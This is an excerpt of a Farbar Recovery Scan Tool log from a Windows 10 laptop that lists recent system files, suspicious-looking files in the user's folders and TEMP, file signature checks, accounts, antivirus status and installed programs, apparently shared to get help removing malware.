2016-03-09 10:30 - 2016-02-23 08:42 - 00078176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-03-09 10:30 - 2016-02-23 08:39 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-09 10:30 - 2016-02-23 08:38 - 20858360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-09 10:30 - 2016-02-23 08:35 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 10:30 - 2016-02-23 08:20 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-03-09 10:30 - 2016-02-23 08:17 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-03-09 10:30 - 2016-02-23 08:15 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-09 10:30 - 2016-02-23 08:15 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-03-09 10:30 - 2016-02-23 07:59 - 00319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-03-09 10:30 - 2016-02-23 07:59 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-09 10:30 - 2016-02-23 07:57 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-09 10:30 - 2016-02-23 07:45 - 06788608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 10:30 - 2016-02-23 07:42 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 10:30 - 2016-02-23 07:42 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 10:30 - 2016-02-23 07:38 - 02663424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-09 10:30 - 2016-02-23 07:37 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetCfgNotifyObjectHost.exe
2016-03-09 10:30 - 2016-02-23 07:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-09 10:30 - 2016-02-23 07:25 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 10:30 - 2016-02-23 07:18 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 10:30 - 2016-02-23 07:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-03-09 10:30 - 2016-02-23 07:17 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-03-09 10:30 - 2016-02-23 07:14 - 00841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-03-09 10:30 - 2016-02-23 07:08 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 10:30 - 2016-02-23 07:04 - 00225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 10:30 - 2016-02-23 07:03 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 10:30 - 2016-02-23 07:03 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 10:30 - 2016-02-23 07:02 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 10:30 - 2016-02-23 06:55 - 14241792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 10:30 - 2016-02-23 06:51 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 10:30 - 2016-02-23 06:51 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 10:30 - 2016-02-23 06:48 - 05157376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 10:30 - 2016-02-23 06:46 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 01844736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 10:30 - 2016-02-23 06:45 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 10:30 - 2016-02-23 06:44 - 01821696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-09 10:30 - 2016-02-23 06:29 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-03-09 10:30 - 2016-02-23 06:17 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-09 10:30 - 2016-02-23 06:17 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 10:30 - 2016-02-23 06:11 - 12589056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 10:30 - 2016-02-23 06:03 - 01495040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-08 10:22 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-08 10:20 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 10:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-08 10:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-08 10:04 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-08 09:48 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-08 09:46 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-08 09:30 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-07 17:40 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-04-05 12:56 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-29 09:21 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-28 18:18 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-23 23:06 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 18:59 - 2015-11-04 19:30 - 00000000 ____D C:\WINDOWS\Panther
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
2016-03-14 22:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-03-14 19:01 - 2013-11-10 15:08 - 00000000 ____D C:\WINDOWS\pss
2016-03-13 19:51 - 2011-12-12 02:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-03-13 19:21 - 2015-02-14 12:26 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\TeamViewer
2016-03-13 19:21 - 2011-03-24 03:30 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Mozilla
2016-03-13 17:24 - 2015-07-30 18:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-13 14:00 - 2015-09-10 01:42 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\system32\NV
2016-03-11 19:12 - 2015-07-12 12:14 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-10 23:34 - 2015-07-30 17:49 - 00342192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-10 23:23 - 2010-10-24 03:29 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Azureus
2016-03-10 23:20 - 2010-11-03 00:18 - 00000000 ____D C:\Users\RoNiN\Documents\Vuze Downloads
2016-03-09 18:46 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-03-09 18:12 - 2013-09-15 20:36 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 17:36 - 2010-10-16 20:41 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2016-03-13 19:24 - 2016-03-13 19:47 - 6000640 _____ () C:\Program Files (x86)\GUTD8C6.tmp
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2015-02-21 16:19 - 0001385 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
2015-07-12 12:16 - 2015-07-12 12:22 - 0000112 _____ () C:\ProgramData\WceNM3o.dat
 
Files to move or delete:
====================
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
C:\ProgramData\WceNM3o.dat
C:\Users\RoNiN\autoplaylist.dat
C:\Users\RoNiN\cddbcontrol.dll
C:\Users\RoNiN\cddblink.dll
C:\Users\RoNiN\cddbmusicid.dll
C:\Users\RoNiN\convert.exe
C:\Users\RoNiN\dbghelp.dll
C:\Users\RoNiN\dunzip32.dll
C:\Users\RoNiN\fixrjb.exe
C:\Users\RoNiN\hxaudiodevicehook.dll
C:\Users\RoNiN\ierjplug.dll
C:\Users\RoNiN\keys.dat
C:\Users\RoNiN\mc_enc_h263.dll
C:\Users\RoNiN\mediainfo.dll
C:\Users\RoNiN\mmcdda32.dll
C:\Users\RoNiN\rdsf3260.dll
C:\Users\RoNiN\realcleaner.exe
C:\Users\RoNiN\realconverter.exe
C:\Users\RoNiN\realjbox.exe
C:\Users\RoNiN\realplay.exe
C:\Users\RoNiN\realshare.exe
C:\Users\RoNiN\realtrimmer.exe
C:\Users\RoNiN\rjbres.dll
C:\Users\RoNiN\rjdlg.dll
C:\Users\RoNiN\rjprog.dll
C:\Users\RoNiN\rjwmapln.dll
C:\Users\RoNiN\rndevicedbbuilder.exe
C:\Users\RoNiN\rpau3260.dll
C:\Users\RoNiN\rphelperapp.exe
C:\Users\RoNiN\rpplugprot.dll
C:\Users\RoNiN\rpshell.dll
C:\Users\RoNiN\rpshellextension.dll
C:\Users\RoNiN\rpshellsearch.dll
C:\Users\RoNiN\rpwa3260.dll
C:\Users\RoNiN\strs23.dat
C:\Users\RoNiN\strs26.dat
C:\Users\RoNiN\tnetdtct.dll
C:\Users\RoNiN\tpasdk.dll
C:\Users\RoNiN\tsasdk.dll
C:\Users\RoNiN\wmdmhelper.dll
 
 
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe
C:\Users\RoNiN\AppData\Local\Temp\io1.exe
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-08 10:02
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-08 10:30:23)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Emsisoft Anti-Malware (Enabled - Out of date) {15510D9D-6530-DA29-224F-7BA1BDD1CB58}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Out of date) {AE30EC79-430A-D5A7-18FF-40D3C65681E5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{EBFF2EA1-3944-4CA2-89FA-8B70C0058DD3}) (Version: 49.0.2623.40 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 11.0 - Emsisoft Ltd.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
